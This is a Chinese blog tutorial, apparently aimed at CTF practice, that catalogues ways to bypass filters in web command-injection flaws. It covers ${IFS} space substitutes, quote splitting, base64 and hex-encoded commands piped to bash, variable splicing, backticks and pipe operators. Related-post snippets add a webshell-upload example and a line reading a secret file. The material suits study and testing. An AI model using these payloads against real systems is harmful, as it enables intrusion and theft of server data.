命令执行 rce各种绕过技巧

原创 已于 2024-01-13 22:40:59 修改
· 2.4k 阅读 · 43 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#chrome #前端 #安全 #web安全

于 2024-01-13 22:30:55 首次发布
本文详细介绍了命令执行漏洞的概念,成因,以及在Linux和Windows系统中的常见绕过方法,包括利用空格、特殊字符、环境变量、编码技巧、管道符等,旨在提升网络安全意识和技术防护措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

目录

命令执行漏洞简介

1. linux读取命令

2.空格

3.常见的命令执行函数

4.字符过滤

1.单双引号反斜杠保住命令,如"l"'s','和"称为连接符,用来连接字符串,l``s

2.使用通配符? *例如:cat *.txt

3.base64,ASCII,shellcode编码绕过,例如过滤cat

4.拼接命令实现过滤例如#cat flag.php

5.使用环境变量

6.ban掉括号使用反引号实现通杀解

7.使用换行符\

8.无回显函数执行

9.未定义的初始化变量(空变量)

10.printf绕过(字符串进制绕过)

5.取反绕过

6.windows 和 linux 管道符

windows

linux

命令执行漏洞简介

命令执行漏洞就是黑客可以直接在web应用中执行系统命令,从而获取敏感信息或者拿下shell权限。

命令执行漏洞成因命令执行漏洞形成的原因是web服务器对用户输入的命令安全监测不足,导致恶意代码被执行。

接下来是各种命令执行的绕过技巧

1. linux读取命令

cat
tac tac命令的功能是用于反向显示文件内容.也就是说,当我们使用tac命令查看文件内容时,最先显示的是最后一行,倒数第二行,倒数第三行,以此类推到最后显示原本文件的第一行内容。
head head命令的功能是显示文件开头的内容,默认为前10行。
more
less
tail
od od命令会读取所给予的文件的内容,并将其内容以八进制字码呈现出来。
nl
uniq
sort
rev

2.空格

` 1.重定向符,文件读取时,可用cat<>flag.php,单独使用<似乎也可以`

`2.${IFS},$IFS$9,$IFS

${IFS}:

$IFS$9:

`3.控制字符代替,%09(tab),%0a`

`4.字符串截取空格,例如ctfshow=aabbcc,${ctfshow}=aabbcc,${ctfshow:2}=bbcc,${ctfshow:4:1}=c,有理论基础就可以通过已经定义的环境变量来构造字符串。`
5.在bash下还可以使用{cmd,args}`,例如{cat,text}

3.常见的命令执行函数

system():执行外部函数,并且显示输出

passthru():执行外部程序并且显示原始输出

shell_exec(): 通过shell执行命令并将完整的输出以字符串的方式返回

exec():执行外部函数:
针对exec()无回显函数,可以执行ls /|tee 1.txt,将内容保存到1.txt中,然后访问

4.字符过滤

1.单双引号反斜杠保住命令,如"l"'s','和"称为连接符,用来连接字符串,l``s
 


2.使用通配符? *例如:cat *.txt
 

3.base64,ASCII,shellcode编码绕过,例如过滤cat

base64:
echo t|base64,将t转为base64编码
ca$(echo 'dAo'|base64 -d) 1.txt



ACSII码:
import binascii
s = b"tac flag"
h = binascii.b2a_hex(s)
print(h)
echo "74616320666c61672e706870" |xxd -r -p|bash
?cmd=passthru('echo "74616320666c61672e706870"|xxd -r -p|bash');

shellcode:
例如: echo "\x63\x61\x74\x20\x31\x2e\x74\x78\x74"|bash
`(echo "\x63\x61\x74\x20\x31\x2e\x74\x78\x74")`,反引号执行()里的命令

4.拼接命令实现过滤例如#cat flag.php

a=ca;b=t;m=flag;n=.php;$a$b $m$n


5.使用环境变量
6.ban掉括号使用反引号实现通杀解

cat `echo `1.txt``

echo `1.txt`|base64
cat `echo 'MSS0eHQK'|base64 -d`


7.使用换行符\

例如执行命令 ca\t 1.t\xt

8.无回显函数执行

使用延时函数,例如ls|sleep 3

9.未定义的初始化变量(空变量)

cat 1.t${x}xt

10.printf绕过(字符串进制绕过

\NNN 八进制数 NNN 所代表的 ASCII 码字符。

\xHH 十六进制 HH 对应的8位字符。HH 可以是一到两位。

\uHHHH 十六进制 HHHH 对应的 Unicode 字符。HHHH 一到四位。

\UHHHHHHHH十六进制 HHHHHHHH 对应的 Unicode 字符。HHHHHHHH 一到八位

5.取反绕过

php代码:
<?php
echo urlencode(~"system");
print("\n");
echo urlencode(~"cat /f*");

6.windows 和 linux 管道符

windows

| 直接执行后面的命令。
|| 前面执行的命令执行出错才执行后面的语句。
& 前面的语句无论真假都可以执行后面的语句。(无条件执行后面的语句,推荐使用。)
&& 前面语句为真才能执行后面的语句。

linux

Linux系统支持的管道符:
| 显示后面语句的执行结果。

fig:


; 执行完前面的语句再执行后面的。
|| 前面语句执行错误才执行后面的语句。
& 前面语句无论真假都会执行后面的语句。(无条件执行后面的语句,推荐使用。)

&& 前面的语句为真才能执行后面的语句。

fig:

绕过WAF运行命令执行漏洞的方法大全
hackzkaq的博客
10-09 2394
文章目录**前言****一、windows下**二、进入linux三、一个有趣的例子总结 前言 作者:掌控安全-桐镜 今天发散一下思维,聊聊关于命令执行漏洞绕过过滤的方法,让我们一起由浅入深。 一、windows下 1.1 符号与命令的关系 在看一个例子开始之前,首先了解一点,”和^这还有成对的圆括号()符号并不会影响命令的执行。在windows环境下,命令可以不区分大小写 whoami //正常执行 w"h"o"a"m"i //正常执行 w"h"o"a"m"i" //正常执行 wh"“oami //正常执
WEB攻防-RCE代码&命令执行&过滤绕过&异或无字符&无回显方案&黑白盒挖掘
weixin_45534587的博客
02-09 949
RCE,全称 Remote Code Execution,也就是远程代码执行。简单来说,它是一种非常危险的安全漏洞。正常情况下,我们访问一个网站或者使用某个应用程序,只能按照开发者设定好的功能来操作。但要是存在 RCE 漏洞,攻击者就能打破这种限制,在目标服务器上执行他们自己编写的代码。
命令执行的一些绕过技巧
m0_55754984的博客
09-14 4118
① 空格过滤 空格可以用以下字符串代替: < 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 $IFS在linux下表示分隔符,但是如果单纯的cat$IFS2,bash解释器会把整个IFS2当做变量名,所以导致输不出来结果,然而如果加一个{}就固定了变量名,同理在后面加个$可以起到截断的作用 ,但是为什么要用$9呢,因为$9只是当前系统shell进程的第九个参数的持有者,它始终为空字符串。 ② 一些命令分隔符 linux中:%0a
rce绕过
最新发布
2401_88743143的博客
04-12 100
如果页面中存在这些函数并且对于用户的输入没有做严格的过滤,那么就可能造成远程命令执行漏洞。rce:调用可以执行命令的参数,参数可控没有过滤。1、过滤关键字,如过滤 cat,flag等关键字。使用空变量$*和$@,$x,${x}绕过。1.利用系统函数实现命令执行的函数。2.直接执行系统命令的代码函数。反引号绕过cat 'ls'4、面对过滤绕过方法。
【网络安全---Linux命令绕过】Linux下命令执行绕过技巧(很全,很实用)
m0_67844671的博客
09-24 4272
Linux下命令执行绕过方式和思路;网站上可能有一些能执行系统命令的地方,但是对一些关键字和空格等做了一些防护,如何绕过就成了一个难题,这篇文章分享一些Linux下的命令执行绕过技巧以及思路,不如说空格的绕过,关键字绕过,编码绕过等等;
命令执行漏洞各种绕过方式
m0re's blog
07-10 8213
本文目录前言命令执行漏洞绕过方式管道符windows中常见管道符linux中常见管道符空格过滤黑名单绕过通配符绕过内敛执行绕过编码绕过绕过长度限制`>`和`>>`两个符号的使用命令换行最后参考文章 前言 刚做了一道题,是有关命令执行漏洞的,里面过滤的内容比较多,一时间找不到头绪,所以学习一下关于命令执行漏洞的绕过方式,以便以后遇到不会像现在这样一点思路都没有。 命令执行漏洞绕过方式 管道符 windows中常见管道符 | 直接执行后面的语句 || 如果前面命令是错的那么就执行后面的语句
关于命令执行漏洞绕过过滤的讨论
2301_80127209的博客
04-28 937
今天和各位大佬一起发散一下思维,聊聊关于命令执行漏洞绕过过滤的方法,让我们一起由浅入深。在实际绕过中,可以用多种方式来组合测试进行绕过,可以看出本篇多次使用各种组合来执行命令,主要是希望哥哥们多去尝试,发散思维。
RCE-eval长度限制绕过技巧
2301_78549931的博客
08-14 899
反引号可以执行命令,当我们传入参数时,反引号里面的内容会被执行,然后再传给param接收,此时如果我们通过参数1注入我们想要执行的命令,那我们的命令将会被执行。所以我们可以将一句话木马一个一个的创建文件,然后通过文件名排列组合拼接在一起形成一句话木马。但是通过查阅资料我发现,第三个参数在php底层C语言中可以用8表示。,传入usort函数。如果我们传入的payload是这样的,很明显长度超过了限制。所以我们可以将一句话木马一个一个的传入我们的文件N中,N:代表文件名 D:代表写入的参数 8:代表追加。
sql注入绕过+rce
qq_64951792的博客
08-12 1441
RCE基础、SQL注入绕过
CTFHUB-RCE通关记录以及常见的绕过过滤的方法
不想当脚本小子的脚本小子
03-21 2359
先过关,再分析相关的防御源代码 1.过滤cat 然后cat 301472130920273.php然后查看网页源代码即可得到flag 2.过滤cat 根据题目要求过滤了cat 而该服务器为Linux系统区分大小写 就无法通过大小写来绕过 本来想使用vi命令替换cat命令也能查看到flag中的内容 但是失败了 最后用了替换法:127.0.0.0 ; $a=ca;$b=t; $a$b flagxxxx 题目源码: <?php $res = FALSE; if (is.
LFI高级技巧:LFI与命令执行.docxLFI高级技巧:LFI与命令执行all.docxLFI高级技巧:LFI与命令执行-(10).LFI漏洞防护与加固.docxLFI高级技巧:LFI与命令执
08-31
LFI高级技巧:LFI与命令执行.docx LFI高级技巧:LFI与命令执行all.docx ...LFI高级技巧:LFI与命令执行_(8).LFI到RCE的高级转换技巧.docx LFI高级技巧:LFI与命令执行_(9).常见Web应用中LFI漏洞的
命令执行 rce各种绕过技巧_命令执行过滤,2024网络安全开发面试解答之设计模式篇
2401_84254279的博客
04-11 712
cat tac tac命令的功能是用于反向显示文件内容.也就是说,当我们使用tac命令查看文件内容时,最先显示的是最后一行,倒数第二行,倒数第三行,以此类推到最后显示原本文件的第一行内容。 head head命令的功能是显示文件开头的内容,默认为前10行。 more less tail od od命令会读取所给予的文件的内容,并将其内容以八进制字码呈现出来。 nl uniq sort rev`2.IFS,{IFS},IFS,IFS9,9,9,IFS 5.在bash下还可以使用{cmd,args}`,例如{c
命令执行漏洞利用及绕过方式总结,从零基础到精通,收藏这篇就够了!
喜欢Python编程的程序员柚柚呀
02-24 1421
可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。既然可以这样那我们是不是可以在某些限制长度的情况下执行命令,将命令一条一条输入一个文本中再执行,尝试一下。命令会将原有文件内容覆盖,如果是存入不存在的文件名,那么就会新建该文件再存入。在Linux中,当我们执行文件中的命令的时候,我们通过在没有写完的命令后面加。||如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句。&&如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令。&前面和后面命令都要执行,无论前面真假。
命令执行(RCE)面对各种过滤,骚姿势绕过总结
HUANGXIN9898的博客
07-09 3096
RCE又称远程代码执行漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。
常见命令执行的一些绕过方式
qq_53142368的博客
04-26 7002
文章目录一、命令执行二、绕过技巧1.常见管道符2. 空格过滤3. 黑名单绕过4. 绕过长度限制5. ls命令6. 各种读文件命令 一、命令执行 1. php调用外部程序常用的函数: system()—执行shell命令也就是向dos发送一条指令。 shell_exec() — 通过 shell 环境执行命令,并且将完整的输出以字符串的方式返回。 exec() —执行外部程序。 passthru() — 执行外部程序并且显示原始输出。 2. 造成命令执行的原因 代码过滤不严格–如使用system函数调用封装
命令执行各种绕过总结
m0_64815693的博客
10-11 1万+
最近做了题目很多都有命令执行的,这里给自己做一次总结,也给大家一个参考,有各种绕过,十分的详细哦
命令执行漏洞利用及绕过方式总结
PromisingQ
07-31 2955
常见管道符Windows系统支持的管道符Linux系统支持的管道符空格过滤${IFS}重定向符<>%09(需要php环境)黑名单绕过拼接base64编码单引号、双引号反斜线<、>等和$@读文件绕过通配符绕过内敛执行绕过绕过长度限制Linux中的>符号和>>符号Linux中命令换行利用ls -t和>以及换行符绕过长度限制执行命令(文件构造绕过)一道CTF题:hitcon 2017 babyfirst-revenge参考链接常见管...
CTFWeb-命令执行漏洞过滤绕过姿势
热门推荐
道阻且长,行则将至
04-29 2万+
文章目录前言CTF题目绕过姿势命令联合执行关键词的绕过内联执行绕过多种解法变量拼接内联执行Base64编码总结 前言 为了备战(划水)5 月份广东省的 “红帽杯” 网络安全竞赛,继续开始到 BUUCTF 平台练习 CTF 题目。在去年参加的第四届强网杯全国网络安全竞赛中,就遇到过命令执行漏洞绕过的题目 CTF解题-2020年强网杯参赛WriteUp(题目名称 “主动” ),当时采用了 base64 编码联合反引号、变量拼接两种方式绕过了 flag 关键字的过滤并读取了 flag 值: 本文目的在于结合 BU
RCE(远程命令执行)绕过总结
Elite的博客
04-18 5542
常见的RCE(远程命令执行)漏洞绕过方法,及原理讲解,干货满满!
RCE绕过方法
03-23
### RCE Bypass Techniques and Methods RCE(远程代码执行)漏洞通常涉及攻击者通过某种方式上传恶意脚本或利用已有的文件读取功能来实现命令执行。以下是几种常见的绕过技术以及如何利用这些技术的方法。 #### 利用 `/proc` 实现 LFI 至 RCE 的高级方法 一种有效的策略是从本地文件包含(LFI)升级到远程代码执行(RCE)。这可以通过 Linux 系统中的特殊文件路径 `/proc/self/environ` 或其他类似的动态链接器配置文件完成。这种方法允许攻击者注入自定义环境变量并触发其执行[^1]。 例如,在某些情况下,如果应用程序存在未过滤的 `include()` 函数调用,则可以尝试加载如下路径: ```php /proc/self/fd/<file_descriptor> ``` 此路径指向当前进程打开的标准输入流或其他文件描述符的内容。当成功访问该位置时,可进一步探索是否存在交互式会话或者临时存储区域供我们写入任意 PHP 脚本来达成最终目标——即获得 shell 访问权限。 #### Web Shell Upload Example 另一个常见场景是在拥有文件操作能力的情况下直接部署 webshell 文件。假设有一个实验室环境中提供了这样的入口点: ```html <form action="/upload.php" method="post" enctype="multipart/form-data"> Select image to upload: <input type="file" name="fileToUpload" id="fileToUpload"> <input type="submit" value="Upload Image" name="submit"> </form> ``` 此时可通过构造特制 payload 来测试服务器端处理逻辑是否安全可靠。比如下面这段简单的 phpinfo() 测试代码片段可能被用来确认基本运行状况之后再替换为更复杂的控制指令集[^2]: ```php <?php echo file_get_contents('/home/carlos/secret'); ?> ``` 上述例子展示了如何提取特定目录下的敏感数据作为初步验证手段之一;然而实际应用过程中还需要考虑更多因素如编码转换、字符转义等问题以免遭到防御机制拦截失败告终。 #### General Resources on Exploitation Strategies 对于希望深入研究各种类型的 rce 技巧的人来说,《Bug Bounty Reference》文档集合提供了一个很好的起点[^3]。它不仅涵盖了基础理论知识还列举了许多实战案例分析帮助读者更好地理解整个过程及其背后原理。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值